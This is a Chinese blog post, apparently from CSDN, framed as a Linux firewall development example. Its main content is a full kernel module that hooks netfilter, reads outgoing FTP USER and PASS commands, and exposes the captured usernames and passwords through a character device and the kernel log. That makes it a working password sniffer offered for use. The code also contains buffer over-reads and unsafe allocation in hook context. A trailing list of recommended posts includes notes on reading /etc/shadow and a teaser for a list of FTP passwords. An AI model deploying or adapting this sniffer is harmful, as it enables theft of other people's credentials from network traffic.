linux防火墙开发实例 获取FTP账号密码

最新推荐文章于 2023-06-28 16:30:14 发布
最新推荐文章于 2023-06-28 16:30:14 发布
阅读量371 收藏 3
点赞数 
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/cdev.h>
#include <linux/types.h>
#include <linux/netdevice.h>
#include <linux/skbuff.h>
#include <linux/netfilter_ipv4.h>
#include <linux/inet.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>
 
#define SECOND_MAJOR 0
 
//用于显示IP
#define NIPQUAD(addr) \ ((unsigned char *)&addr)[0], \
  ((unsigned char *)&addr)[1], \
  ((unsigned char *)&addr)[2], \
  ((unsigned char *)&addr)[3]
 
//通信端口
static int second_major = SECOND_MAJOR;
//注册通信端口时用到的结构 保存端口信息
struct cdev g_cdev;
 
 
char *g_UserName = NULL;
char *g_PassWord = NULL;
char *g_Retstr = NULL;
 
int second_open(struct inode *inode, struct file *filp)
{
  printk("Open!\n");
  return 0;    
}
 
int second_release(struct inode *inode, struct file *filp)
{
    printk("Release!\n");
    return 0;
}
static ssize_t second_read(struct file *filp, char __user *buf, size_t count, 
  loff_t *ppos)
{
  int ret = 0;
  //printk("Read!\n");
  if(g_UserName && g_PassWord && g_Retstr)
  {
  	if(*g_UserName == '\0' || *g_PassWord == '\0')
	{
		return 0;
	}
  	strcpy(g_Retstr,"UserID:");
	strcat(g_Retstr,g_UserName);
	strcat(g_Retstr," PassWord:");
	strcat(g_Retstr,g_PassWord);
  //断数据可以用put_user 字符串或大数据使用copy_to_user
    if (copy_to_user(buf,g_Retstr,256))
    {
       ret =  -EFAULT;
    }else
    {
       ret = 256;
    }
    memset(g_UserName,'\0',256);
	memset(g_PassWord,'\0',256);
  }
 
  return ret;
}
 
//通信分发函数设置
static const struct file_operations second_fops =
{
    .owner = THIS_MODULE,
    .open = second_open,//open
    .release = second_release,//close
    .read = second_read,//read
};
 
static unsigned int ipprint_func(
unsigned int hooknum,
struct sk_buff * skb,
const struct net_device *in,
const struct net_device *out,
int (*okfn) (struct sk_buff *))
{
    __be32 sip,dip;
 
    struct tcphdr *tcph = NULL;
    struct udphdr *udph = NULL;
    unsigned short sport = 0;
    unsigned short dport = 0;
    struct iphdr *iph;
    char *data = NULL;
    char *Username = NULL;
    char *PassWord = NULL;
    int i = 0;
    int len = 0;
    if(skb)
    {
        struct sk_buff *sb = NULL;
        sb = skb;
        //获取ip头
        iph  = ip_hdr(sb);
        //不说了
        sip = iph->saddr;
        dip = iph->daddr;
 
        //如果协议不是TCP就放过
        if(iph->protocol != IPPROTO_TCP)
          return NF_ACCEPT;   
      
      //获取tcp头
        /*
        ihl(Internet Header Length 报头长度),
        位于IP报文的第二个字段,4位,
        表示IP报文头部按32位字长(32位,4字节)计数的长度,也即报文头的长度等于IHL的值乘以4。 
        */
       tcph = (struct tcphdr *)((char *)skb->data + (int)(iph->ihl * 4));
       //要使用tcp_hdr 必须跳过ip头 也就是将ip端push出去
            //tcph = tcp_hdr(sb);
       //获得端口
        sport=ntohs(tcph->source);
        dport=ntohs(tcph->dest);
	 //printk("dPort:%u",dport);
        if(dport != 21)
          return NF_ACCEPT;
        //获取tcp数据
        data = (char *)((int)tcph + (int)(tcph->doff * 4));
 
        //下面的可以抓个FTP包看看就明白了
        if(strncmp(data,"USER",4) == 0)
        {
            //printk("Found User!\n");
            data += 5;
            while (*(data + i) != '\r' 
                && *(data + i) != '\n'
                && *(data + i) != '\0' 
                && i < 15) 
            {
                   len++;
                   i++;
            }
 
             if ((Username = kmalloc(len + 2, GFP_KERNEL)) == NULL)
             {
                printk("UserName is null !\n");
                return NF_ACCEPT;
             }
                  
            memset(Username, 0x0, len + 2);
            memcpy(Username, data, len);
            *(Username + len) = '\0';    
            if(strcmp(Username,"anonymous") == 0)
            {
              kfree(Username);
              Username = NULL;
            } 
          } else if(strncmp(data,"PASS",4) == 0)
          {
            //printk("Found PassWord!\n");
            data += 5;
            while (*(data + i) != '\r' 
                && *(data + i) != '\n'
                && *(data + i) != '\0' 
                && i < 15) 
            {
                   len++;
                   i++;
            }
 
              if ((PassWord = kmalloc(len + 2, GFP_KERNEL)) == NULL)
              {
                    printk("UserName is null !\n");
                    return NF_ACCEPT;
              }
                memset(PassWord,0x0,len+2);
                memcpy(PassWord,data,len);
                *(PassWord + len) = '\0';
                if(strstr(PassWord,"@"))
                {
                  kfree(PassWord);
                  PassWord=NULL;
                }
          }   else 
          {
		    //	printk("No Found FTP!\n");
               return NF_ACCEPT;
          }
        //printk("Packet for source address: %u.%u.%u.%u:%u destination address: %u.%u.%u.%u:%u\n ", NIPQUAD(sip),sport,NIPQUAD(dip),dport);
          if(Username)
          {
            printk("UserName:%s\n",Username);
            memset(g_UserName,0x0,256);
           // strcpy(g_UserName,Username);
			memcpy(g_UserName,Username,256);
            kfree(Username);
          }
          if(PassWord)
          {
            printk("PassWord:%s\n",PassWord);
            memset(g_PassWord,0x0,256);
           // strcpy(g_PassWord,PassWord);
		   memcpy(g_PassWord,PassWord,256);
            kfree(PassWord);
          }
    }
    return NF_ACCEPT;
}
 
//设置回调信息
 struct nf_hook_ops ipprint_ops = {
   .list =  {NULL,NULL},
   .hook = ipprint_func,//回调函数
   .pf = PF_INET,//协议 ipv4还是ipv6
   .hooknum = NF_INET_POST_ROUTING,//hook在什么地方
   //.hooknum = NF_INET_LOCAL_IN,
   .priority = NF_IP_PRI_FILTER+2//优先级
 };
 
static int __init ipprint_init(void) 
{
    int ret;
	int iDevno = 0;
  //从用户那里尝试获得一个设备号
    dev_t devno = MKDEV(second_major, 0);
    //如果用户没有指定 就直接申请一个
    if (second_major)
    {
        ret = register_chrdev_region(devno, 1, "second");
    }else
    {
        ret = alloc_chrdev_region(&devno, 0, 1, "second");
        second_major = MAJOR(devno);
    }
    if (ret < 0)
    {
        return ret;
    }
    /*if((g_cdev = (struct cdev)kmalloc(sizeof(struct cdev),GFP_KERNEL)) == NULL)
    {
        ret = -ENOMEM;
        unregister_chrdev_region(devno, 1);
        return ret;
    }
    memset(g_cdev,0x0,sizeof(struct cdev));*/
 
    //获得设备号
    iDevno = MKDEV(second_major,0);
    //初始化通信
    cdev_init(&g_cdev, &second_fops);
    g_cdev.owner = THIS_MODULE;
    g_cdev.ops = &second_fops;
    ret = cdev_add(&g_cdev, iDevno, 1);
    if (ret)
    {
        printk(KERN_NOTICE "Error %d add second%d", ret, 0);
    }
 
    g_UserName = kmalloc(256,GFP_KERNEL);
    g_PassWord = kmalloc(256,GFP_KERNEL);
	g_Retstr = kmalloc(256,GFP_KERNEL);
    if(g_UserName==NULL || g_PassWord==NULL || g_Retstr == NULL )
    {
        unregister_chrdev_region(devno, 1);
        /*if(g_cdev)
            kfree(g_cdev);*/
        return -ENOMEM;
    }
    //注册网络防火墙
    nf_register_hook(&ipprint_ops);
    printk("DriverEntry!\n");
    return 0;
}
 
 
static void __exit ipprint_exit(void) 
{
  nf_unregister_hook(&ipprint_ops);
  kfree(g_UserName);
  kfree(g_PassWord);
  kfree(g_Retstr);
  cdev_del(&g_cdev);
  //kfree(g_cdev);
  unregister_chrdev_region(MKDEV(second_major, 0), 1); 
  printk("DriverUnload!\n");
}
 
 module_init(ipprint_init);
 module_exit(ipprint_exit); 
 module_param(second_major, int, S_IRUGO);
 MODULE_AUTHOR("djwow");
 MODULE_DESCRIPTION("GetFtpPassTest");
MODULE_LICENSE("GPL");

 

gj333
关注
Linux Netfilter开发小结
zhuhuibeishadiao
05-25 9156
前置知识: IP包: struct ip { #if BYTE_ORDER == LITTLE_ENDIAN unsigned char ip_hl:4, /* header length */ ip_v:4; /* version */ #endif unsigned char ip_tos; /* type of service */ sho
查询linuxftp的用户名和密码
xswl1的博客
12-07 1万+
默认vsftpd路径是/etc/vsftpd/,那么 [root@bj ~]# cd /etc/vsftpd/ [root@bj vsftpd]# ls chroot_list ftpusers user_conf user_list vsftpd.conf vsftpd_conf_migrate.sh vsftp.tar.gz vuser_passwd.db vuser_passwd.db.bak vuser_passwd.txt [root@bj vsftpd]# cat vuser.
查看linuxftp账号密码是什么,用什么命令查看LINUX有几个FTP 账号和其权限?
weixin_32556315的博客
04-30 4822
满意答案rpxtaur712017.10.03采纳率:57%等级:13已帮助:42133人查看ftp帐号的方法是安装ftp服务使用的软件所决定的。如果是使用的vsftpftp服务软件,在/etc/vsftpd下面有个vsftpd.user_list的文件,这里面包含了ftp帐号,可以通过cat、more、less等命令直接查看,[test@linux]# cat /etc/vsftpd...
linux查看ftp账号密码文件,查看vsftp登录认证数据库db文件内容的方法
weixin_28728265的博客
05-09 1639
在搭建vsftp的时候,很多人会用db_load为虚拟用户建立数据库文件。但是如果是后任接手,恰好又没有做这方面的交接,就比较麻烦了——比如我,前任做的VSFTP没留下太多资料,只好自己查,好辛苦。几经周折,终于确认了vsftp的用户名和密码放在一个叫vsftpd_login.db文件中,然而这个文件无法查看内容,完全不知道到底目前有多少用户可以登录vsftp,用户名密码是啥……查了一下vsftp...
linux系统查看FTP用户名密码,LinuxFTP的三种登录方式:
weixin_42469243的博客
04-28 1万+
LinuxFTP的三种登录方式:我们登录FTP有三种方式,匿名登录、本地用户登录和虚拟用户登录。匿名登录:在登录FTP时使用默认的用户名,一般是ftp或anonymous。本地用户登录:使用系统用户登录,在/etc/passwd中。虚拟用户登录:这是FTP专有用户,有两种方式实现虚拟用户,本地数据文件和数据库服务器。FTP虚拟用户是FTP服务器的专有用户,使用虚拟用户登录FTP,只能访问FTP服...
Linux服务器部署工程(柳州职业技术学院)电信院22级工程
最新发布
qq_35192121的博客
06-28 1087
Linux服务器部署工程。
Linux
m0_54202121的博客
10-16 854
目录 1.Linux简介 1.1Linux 的发行版 1.2Linux 应用领域 1.3Linux vs Windows 2.Linux内容 3.安装VM和Centos 3.1VMware安装 3.2Centos安装 4.Linux目录结构 4.1基本介绍 4.2以下是对这些目录的解释: 5.Linux远程登陆 5.1为什么要远程登陆Linux 5.2.下载-安装-配置-使用: 5.3远程登录Linux-Xshell6 5.3.2Xshell安装配置和使用 5.4远程上传下
华南农业大学Linux课程综合实验——用Java、PHP、Go、Nodejs语言,实现从MySQL读取内容并显示在浏览器上
m0_67393593的博客
06-21 888
服务器购买:云服务器ECS_云主机_服务器托管_弹性计算-阿里云 云产品试用:阿里云试用中心_云服务器试用_企业试用场景_开发者云产品试用 学生的学习与优惠:开发者成长计划点击右上角的->点击->点击。 1、创建快照 点击->点击。2、修改实例名称 可改可不改。实例名称改为,那么远程连接时有。3、重置服务器密码,然后用Xshell远程连接服务器 点击来设置服务器密码->在Xshell中通过账号(root)密码(你刚刚重置的实例密码)进行远程登录服务器。因为阿里云上重置实例密码,它对密码的格式有要求,你重置
linux ftp 任意密码,LinuxFTP实用命令
weixin_29187895的博客
04-29 367
1.连接ftpftp 192.168.1.2提醒:分别输入用户名和密码进行认证;特别注意:如果FTP 允许匿名用户,那么用户名要输入anonymous,密码任意。 不能直接敲回车。2.查看帮助信息ftp > help#查看指定命令的帮助信息ftp > help put3.下载文件1)get remote-file local-file将一个文件从远程主机中下载到本地主机中例如:获取远程...
linux vsftp查看ftp账号信息的方法
newmiracle学习天地
12-14 4万+
linux vsftp查看ftp账号信息的方法 查看注册的FTP账号 在 /etc/vsftpd/chroot_list 密码看不到 只能重置密码 passwd username查看原文:http://newmiracle.cn/?p=654
linux系统怎么设置ftp账号密码错误,linux系统FTP设置账号密码
weixin_39678089的博客
04-30 5096
linux系统FTP设置账号密码(2015-12-24 09:57:32)一、启动vsftpd服务1、 启动VSFTP服务器A:cenos下运行:yum install vsftpdB. 登录Linux主机后,运行命令:”service vsftpd start”C. 要让FTP每次开机自动启动,运行命令: “chkconfig --level 35 vsftpd on”二、设置FTP权限A. 编...
linux搭建有密码的ftp,在LINUX系统上建立FTP加密传输(全部完成)(实做)
weixin_39932611的博客
04-30 385
在众多的FTP服务器中PROFTPD由于它的配置灵活,安装简便。近年来一直受到人们的喜爱。通常情况下FTP包括认证过程,传输是明文传输的,在传输一些敏感数据时总是不能让人放心。今天我在网上找了一些零散的资料结合自己的实作写了个帖子贡献给大家。下载最新的软件版本:# wget首先创建ROFTPD运行的用户和组:# groupadd nogroup# useradd –g nogroup –d /de...
ftp 客户端 linux
aa804738534的博客
09-12 397
基本功能介绍 功能 实现 命令 登陆服务器 进入客户端后登陆服务器 open 127.0.0.1 注销、退出 注销服务器,不退出客户端 close 直接退出客户端 ...
Linux端口转发 端口映射相关 (iptables实现)
Romanticn_chu的博客
05-24 1243
一、本地端口映射 即访问192.168.10.11:8080 访问到192.168.10.11:80 iptables -t nat -A PREROUTING -p tcp --dport 8080 -j REDIRECT --to-ports 80 二、异地端口映射 即访问192.168.10.11:8080 访问到192.168.10.20:80 1、开启转发功能 vim /etc/sysctl.conf 添加如下: net.ipv4.ip_forward = 1 (永久开启转发功
Linux iptables规则详解
jasonswift的博客
10-24 2028
iptables规则配置详情*filter :INPUT DROP [345:43237] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [306:41346] -A INPUT -p tcp -m tcp --dport 10022 -j ACCEPT -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT -A INPUT -p tcp
查看linux用户密码
热门推荐
飞乐鸟的博客
10-17 8万+
需要root用户 用户名在/etc/passwd这个文件中; 密码在/etc/shadow中 cat /etc/passwd cat /etc/shadow root:$6$1WtyW6O0baQmTkDG$o.YXXTOZSb7hP4HitigzaW/mZS433aSFpancmyNKYxU/59FuPVlIeVNBUKQQVgzx3kszkQAxo6C2wjrRbv0VZ.::0:99999:7::: 格式解释 {用户名}:{加密密码}:{口令最后修改时间距原点..
linux查看用户密码(linux查看用户密码命令)
shuux666的博客
04-20 1万+
linux查看用户密码(linux查看用户密码命令) 2020-05-15 13:18:30 共10个回答 1、用户名和密码的存储位置存储帐号的文件:/etc/passwd存储密码的文件:/etc/shadow2、可以使用cat、more、head、tail以及vim等命令查看或者修改,如下图所示:比如要查找系统中admin普通用户的密码,则执行:cat/etc/shadow|grep"admin"3、注意:/etc/shadow文件中的密码不是明文密码.如上图所示,第1个“:”号后面的即为“口令”字段,存
Linux下添加FTP账号和服务器、增加密码和用户,更改FTP目录
就是你的博客
08-18 4万+
1、 启动VSFTP服务器 A:cenos下运行:yum  install  vsftpd B. 登录Linux主机后,运行命令:”service vsftpd start” C. 要让FTP每次开机自动启动,运行命令:  “chkconfig --level 35 vsftpd on”   2、设置FTP权限 A. 编辑VSFTP配置文件,运行命令
全面收录:FTP服务器账号与密码集合
"FTP帐号密码大全" FTP (File Transfer Protocol) 是一种用于在互联网上传输文件的标准协议。在这个资源中,列举了一些公开的FTP服务器地址、用户名和密码,供用户访问下载各种资源,如电影、音乐和连续剧等。这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值